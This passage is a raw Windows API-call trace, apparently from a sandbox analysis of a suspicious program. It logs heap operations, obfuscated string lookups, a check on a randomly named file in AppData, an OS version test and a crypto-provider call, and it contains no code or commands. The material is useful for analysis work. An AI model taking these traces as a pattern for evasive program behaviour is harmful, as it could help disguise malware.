Size=0x10) returned 0x2aaa090 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.349] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/x_7SfFt5-eJAhmf88.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10a83210, ftCreationTime.dwHighDateTime=0x1d5cc61, ftLastAccessTime.dwLowDateTime=0x5e8983f0, ftLastAccessTime.dwHighDateTime=0x1d5c796, ftLastWriteTime.dwLowDateTime=0x5e8983f0, ftLastWriteTime.dwHighDateTime=0x1d5c796, nFileSizeHigh=0x0, nFileSizeLow=0xd7ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="x_7SfFt5-eJAhmf88.gif", cAlternateFileName="X_7SFF~1.GIF")) returned 0x9e1af8 [0152.349] FindClose (in: hFindFile=0x9e1af8 | out: hFindFile=0x9e1af8) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0152.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0152.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0152.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0152.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.350] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.350] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0152.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.351] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.351] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.351] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.351] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0152.351] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.352] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.353] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.353] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.353] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.353] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.353] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0152.353] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.353] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0152.353] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.353] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.354] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.354] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0152.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0152.354] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.354] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.354] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.354] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.354] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.354] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0152.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0152.354] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf110) returned 1 [0152.355] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.355] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.355] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0152.355] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.355] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0152.355] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.355] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.355] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.355] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.355] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.355] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.356] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.356] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.356] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.356] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.356] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 